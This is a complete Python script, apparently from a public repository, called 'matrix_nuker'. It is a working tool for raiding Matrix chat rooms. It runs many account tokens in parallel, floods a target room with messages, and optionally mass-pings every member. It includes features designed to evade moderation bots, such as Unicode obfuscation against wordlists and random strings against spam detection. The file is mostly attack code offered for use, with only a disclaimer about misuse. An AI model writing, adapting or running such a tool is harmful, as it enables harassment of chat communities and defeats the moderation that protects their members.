matrix_nuker/matrix_nuker.py

198 lines
7.7 KiB
Python

# matrix_nuker
# Author: Willy
# License: GNU GPLv3 license
# -*- coding: utf-8 -*-
import threading
import random
import time
import random
import signal
import sys
import keyboard
import os
import argparse
import matrix_client.errors
import string
from matrix_client.api import MatrixHttpApi
from matrix_client.client import MatrixClient
from pyfiglet import Figlet
from termcolor import colored
from colored import fg, attr
# Figlet ;)
f = Figlet(font='ansi_shadow')
intro_txt = colored(f.renderText('MATRIX NUKER'), 'red')
print(intro_txt)
print(colored(" _ ._ _ , _ ._", 'red'))
print(colored(" (_ ' ( ` )_ .__)", 'red'))
print(colored(" ( ( ( ) `) ) _)", 'red'))
print(colored(" (__ (_ (_ . _) _) ,__)", 'red'))
print(colored(" `~~`\ ' . /`~~`", 'red'))
print(colored(" ; ;", 'red'))
print(colored(" / \\", 'red'))
print(colored("_____________/_ __ \_____________", 'red'))
print(colored('Author: Willy', 'red',))
print("")
# Phrase Args
parser = argparse.ArgumentParser(description='Simple Python script to spam Matrix rooms. The author is not liable for misuse. View the README for more information. This script is licensed under the GNU GPLv3 license.')
parser.add_argument('-hs', '--home-server', required=True, type=str, help='Specify the homeserver of the bots. Example: https://matrix.org [REQUIRED]')
parser.add_argument('-id', '--room-id', required=True, type=str, help='Specify the ID of the room you want to attack. Example: !XXXXXXX:matrix.org [REQUIRED]')
parser.add_argument("-mf", "--message-file", required=True, help="Specify the file location of the txt file that contains your messages. Example: /home/user/messages.txt [REQUIRED]")
parser.add_argument("-tf", "--token-file", required=True, help="Specify the file that contains your tokens. Example: /home/user/tokens.txt [REQUIRED]")
parser.add_argument("-s", "--sleep", type=float , help="Set the time between each sent message. Useful for bypassing API rate limits. The default is 0.5. Example: 0.5")
parser.add_argument("-pa", "--ping-attack", action='store_true', help='Send @pings to every member of the room you are attacking along with your custom messages. Not recommended for servers with 900-1200+ users.')
parser.add_argument("-pac", "--ping-attack-counter", action='store_true', help='Same as --ping-attack except it puts a random unicode string to evade spam detection.')
parser.add_argument("-cw", "--counter-wordlists", action='store_true', help='A countermeasure against wordlists used by moderation bots. Changes all texts to use unicode lettering randomly to evade wordlists and spam detection.')
args = parser.parse_args()
if args.home_server:
home_server = args.home_server
if args.room_id:
room_id = args.room_id
if args.message_file:
message_file = args.message_file
if args.token_file:
token_file = args.token_file
if args.sleep:
sleep = args.sleep
else:
sleep = 0.5
if args.counter_wordlists:
wordlist_countermeasure = True
else:
wordlist_countermeasure = False
if args.ping_attack:
mass_ping = True
else:
mass_ping = False
if args.ping_attack_counter:
mass_ping_countermeasure = True
else:
mass_ping_countermeasure = False
# Prevent 2 incompatible args
if args.ping_attack and args.ping_attack_counter:
parser.error("Options --ping-attack (-pa) and --ping-attack-counter (-pac) cannot be used together. Choose only one!")
# Startup info
print(colored('Starting attack...', 'red',))
if wordlist_countermeasure == True:
print(colored('Wordlist countermeasure enabled!', 'red',))
if mass_ping == True:
print(colored('Ping attack enabled!', 'red',))
if mass_ping_countermeasure == True:
print(colored('Ping attack with countermeasures enabled!', 'red',))
print(colored(f"Speed: {sleep}", 'red',))
# Make random characters
def generate_random_char():
unicode_value = random.randint(0, 0x10FFFF)
unicode_ran = chr(unicode_value)
unicode_letter = random.choice(string.ascii_letters)
random_char = unicode_ran + unicode_letter
return random_char
# Function for wordlist_countermeasure
def wordlist_countermeasure_changer(text):
choices = ['\u0333', '\u0332']
choices_rand = random.choice(choices)
new_text = ''
for char in text:
if char.isalpha():
if random.choice([True, False]):
new_text += choices_rand + char
else:
new_text += char
else:
new_text += char
return new_text
# Nuke
def nuke_thread(token):
client = MatrixClient(home_server, token=token)
room_id_alias = room_id
try:
room = client.join_room(room_id_alias)
members = room.get_joined_members()
if mass_ping or mass_ping_countermeasure == True:
usernames = ""
for member in members:
usernames += f"{member.user_id} "
usernames = usernames.strip()
except matrix_client.errors.MatrixRequestError as e:
if e.code == 403:
print(colored("[Warn] 403. Unable to access room.", 'red',))
pass
with open(message_file, 'r', encoding='utf-8') as file:
texts = file.read().split(',')
while True:
if wordlist_countermeasure == True:
with open(message_file, 'r', encoding='utf-8') as file_wordlist_countermeasure:
lines = file_wordlist_countermeasure.read().split(',')
for i in range(len(lines)):
lines[i] = wordlist_countermeasure_changer(lines[i].strip())
random_value = random.choice(lines)
matrix = MatrixHttpApi(home_server, token=token)
try:
response = matrix.send_message(room_id_alias, random_value)
if mass_ping == True:
room.send_text(usernames)
if mass_ping_countermeasure == True:
random_char = generate_random_char()
room.send_text(f'{random_char} {usernames}')
except matrix_client.errors.MatrixRequestError as e:
if e.code == 403:
print(colored("[Warn] 403. Unable to access room.", 'red',))
pass
time.sleep(sleep)
else:
nuke_messages = random.choice(texts).strip()
matrix = MatrixHttpApi(home_server, token=token)
try:
response = matrix.send_message(room_id_alias, nuke_messages)
if mass_ping == True:
room.send_text(usernames)
if mass_ping_countermeasure == True:
random_char = generate_random_char()
room.send_text(f'{random_char} {usernames}')
except matrix_client.errors.MatrixRequestError as e:
if e.code == 403:
print(colored("[Warn] 403. Unable to access room.", 'red',))
pass
time.sleep(sleep)
# Main
def main():
with open(token_file, 'r') as file:
tokens = file.read().split(',')
threads = []
for token in tokens:
thread = threading.Thread(target=nuke_thread, args=(token,))
thread.start()
threads.append(thread)
# Trigger main
if __name__ == '__main__':
main()
# Print some stuff
print(colored('Attack started!', 'green', attrs=['bold']))
print("")
print(colored("Press the 'q' key to terminate the attack.", 'red',))
# Exit with Q key
while True:
if keyboard.read_key() == "q":
print(colored("Attack terminated! Exiting...", "red"))
os._exit(0)